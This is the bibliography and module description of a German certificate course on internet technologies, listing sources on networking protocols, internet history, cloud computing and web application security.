Wie http 2.0 das surfen beschleunigt.http://www.heise.de/netze/artikel/Wie-HTTP-2-0-das-Surfen-beschleunigt-2164146.html?artikelseite=4, a.Abgerufen am 29.8.2016.

Hypertext transfer protocol version 2 (http/2).https://tools.ietf.org/html/rfc7540, b.Abgerufen am 29.8.2016.

Icq Messenger.https://play.google.com/store/apps/details?id=com.icq.mobile.client.Abgerufen am: 23.08.2016.

The internet standards process.http://tools.ietf.org/html/bcp9.Abgerufen am: 23.08.2016.

The Information Factories.http://www.wired.com/wired/archive/14.10/cloudware_pr.html.Abgerufen am: 23.08.2016.

Kabelnetzbetreiber beginnt Tests für 1,5 GBit/s.http://www.golem.de/1104/82945.html.Abgerufen am: 23.08.2016.

Literatur Seite 195

Internet of things, smart home.Digitale Forensik Hausarbeit.10.7.2016.

Brief History of the Internet.http://www.internetsociety.org/internet/what-internet/history-internet/brief-history-internet#rand.Abgerufen am: 23.08.2016.

ISOC International.https://www.isoc.de/isoc/.Abgerufen am: 23.08.2016.

Peer-to-Peer: Grundlagen und Architektur.http://lsirpeople.epfl.ch/hauswirth/papers/DBS-P2P.pdf.Abgerufen am: 23.08.2016.

Pop3 via telnet.http://perl-howto.de/2008/06/pop3-via-telnet.html.Abgerufen am: 23.08.2016.

Request for comments: 1166: Internet numbers.http://tools.ietf.org/html/rfc1166.Abgerufen am: 23.08.2016.

Amazon-Weihnachtsgeschäft: Samsung schlägt Apple.http://www.heise.de/newsticker/meldung/Amazon-Weihnachtsgeschaeft-Samsung-schlaegt-Apple-1159335.html.Abgerufen am: 23.08.2016.

Selbstorganisation im Internet.http://de.selfhtml.org/intro/internet/standards.htm#selbstorganisation.Abgerufen am: 23.08.2016.

Skype.https://play.google.com/store/apps/details?id=com.skype.raider&hl=de, a.Abgerufen am: 23.08.2016.

Skype: Staat hört mit.http://www.lawblog.de/index.php/archives/2010/08/17/skype-staat-hort-mit/, b.Abgerufen am: 23.08.2016.

Secure shell (ssh).https://www.uni-koblenz.de/~vnuml/docs/ssh/ssh.pdf.27.01.2006.

25 Jahre WWWwie das World Wide Web erfunden wurde.http://www.t-online.de/computer/internet/id_63216470/sid_40892948/si_1/foto-show-25-jahre-www-wie-das-world-wide-web-erfunden-wurde-.html, a.Abgerufen am: 23.08.2016.

Telekom kündigt Glasfaseranschlüsse mit 1 GBit/s an.http://www.golem.de/1102/81743.html, b.Abgerufen am: 23.08.2016.

Seite 196 Verzeichnisse

Cloud-computing > Organisatorische Arten von Clouds.http://de.wikipedia.org/wiki/Cloud-Computing#Organisatorische_Arten_von_Clouds, a.Abgerufen am: 23.08.2016.

Dotcom-Boom Ende des 20. Jahrhunderts.http://de.wikipedia.org/wiki/Geschichte_des_Internets#Dotcom-Boom_Ende_des_20._Jahrhunderts,b.Abgerufen am: 23.08.2016.

Brief Datei:Arpanet logical map, march 1977.png.http://de.wikipedia.org/wiki/Datei:Arpanet_logical_map,_march_1977.png, a.Abgerufen am: 23.08.2016.

Mosaic (web browser).https://en.wikipedia.org/wiki/Mosaic_%28web_browser%29, b.Abgerufen am: 23.08.2016.

At-Zeichen.http://de.wikipedia.org/wiki/At-Zeichen.Abgerufen am: 23.08.2016.

Cross-Site-Scripting.http://www.vulnerability-lab.com/resources/documents/198.pdf.Abgerufen am: 28.08.2016.

Yahoo Messenger.https://play.google.com/store/apps/details?id=com.yahoo.mobile.client.android.im, a.Abgerufen am: 23.08.2016.

Yahoo verschlüsselt Messenger-Kommunikation.http://www.zdnet.de/88189378/yahoo-verschluesselt-messenger-kommunikation/, b.Abgerufen am: 23.08.2016.

Ab in die Wolken.http://www.zeit.de/2011/08/Cloud-Computing.Abgerufen am: 23.08.2016.

Aktueller Begriff - Cloud Computing. Wissenschaftliche Dienste - Fachbereich WD 10, Kultur, Medien und Sport -Deutscher Bundestag, 2010.

Sebastian Kübeck. Web-Sicherheit - wie Sie Ihre Webanwendungen sicher vor Angriffen schätzen. MITP, Bonn, 2011.aufl. edition, 2011. ISBN 978-3-826-69024-2.

Mario Meir-Huber. Cloud Computing - Praxisratgeber und Einstiegsstrategien. Entwickler.press, Unterhaching, 2.akt. und erweiterte auflage. edition, 2011. ISBN 978-3-868-02076-2.

Larry L Peterson, Bruce S Davie, and Angelika Shafir. Computernetze - eine systemorientierte Einführung.Dpunkt.Verlag GmbH, Heidelberg, dt. ausg. d. 4. amerik. aufl. edition, 2008. ISBN 978-3-898-64491-4.

Jürgen Scherff. Grundkurs Computernetzwerke - Eine kompakte Einführung in Netzwerk- und Internet-Technologien.Springer-Verlag, Berlin, Heidelberg, New York, 2. Überarb. und erw. Aufl. 2010 edition, 2010. ISBN 978-3-834-80366-5.

Christoph Sorge, Nils Gruschka, and Luigi Lo Iacono. Sicherheit in Kommunikationsnetzen -. OldenbourgVerlag, München, 2013. ISBN 978-3-486-72016-7.

Literatur Seite 197

Manuel Ziegler. Web Hacking - Sicherheitslücken inWebanwendungen - Lösungswege für Entwickler. Mit Playgroundim Internet. Carl Hanser Verlag GmbH und Co. KG, München, 2014. ISBN 978-3-446-44112-5.

Z-206 InternettechnologienDie Lehrveranstaltung „Internettechnologien“ gibt einen Überblick über die technischen Grund-lagen des Internets und die Funktionsweise unterschiedlicher Internetdienste. Dem Lernenden werden dabei die Funktionsweise der am weitesten verbreiteten Protokolle und Techniken ver-mittelt. Anschließend wird die Sicherheit von Web Applications näher betrachtet.

Im ersten Studienbrief „Netzwerktechnik“ werden die wichtigsten Grundlagen der Netzwerk-technik mit Fokus auf die Internettechnologien behandelt. Dabei werden die gängigsten Prinzi-pien der Vernetzung vorgestellt und die dafür notwendigen Techniken beschrieben. Des Weite-ren werden die Protokolle näher betrachtet, um ein tieferes Verständnis für die Netzwerktechnik zu schaffen.

Im zweiten Studienbrief „Das Internet“ wird die Geschichte des Internets näher beleuchtet, um so ein tieferes Verständnis für die Wirkungsweise einzelner Techniken zu bekommen. Des Wei-teren werden der Aufbau und die Strukturierung des heutigen Internets näher betrachtet und welche Möglichkeiten zur Verfügung stehen, um sich mit dem Internet zu verbinden.

Im dritten Studienbrief „Internetdienste“ werden die gängigsten Internetdienste und ihre Funk-tionen vorgestellt. Dabei werden besonders die Dienste für die E-Mail-Kommunikation und der Dateiübertragung betrachtet.

Im vierten Studienbrief „World Wide Web“ werden die gängigsten Techniken vorgestellt, die bei einer Website zur Anwendung kommen. Dabei werden die Übertragungsprotokolle, der Aufbau von Websites, die Funktionsweisen von Webbrowsern, die verschiedenen Arten des Webhos-tings und die Techniken von Webservern näher erläutert.

Im letzten Studienbrief „Web Applications Security“ werden Angriffsvektoren auf Web Applica-tions erklärt. Anhand von einer Demo-Plattform werden diese praxisnah demonstriert.

Nach erfolgreichem Abschluss des Moduls hat der Studierende Kenntnisse über die grundle-genden Strukturen und möglichen Transportwege der Informationen im Internet. Der Teilneh-mer kennt die für den Betrieb des Internets erforderliche Hard- und Software und kann deren Bedeutung für die IT-Sicherheit beurteilen. Er kann die aus dem Informationsfluss resultieren-den digitalen Spuren bewerten und Analyseansätze ableiten sowie Eigenschaften wichtiger Dienste nachvollziehen und diese einsetzen. Außerdem kann der Teilnehmer Abwehrmaßnah-men für Web Applications entwickeln, da Angriffsvektoren selbst angewendet werden können.

ZertifikatsprogrammDie Zertifikatsmodule auf wissenschaftlichem Niveau und mit hohem Praxisbezug bilden ein passge-naues Angebot an Qualifikation und Spezialisierung in der nebenberuflichen Weiterbildung. Damit können einzelne Module nebenberuflich studiert werden. Durch die Vergabe von ECTS-Punkten kön-nen sie auf ein Studium angerechnet werden.

https://zertifikatsprogramm.de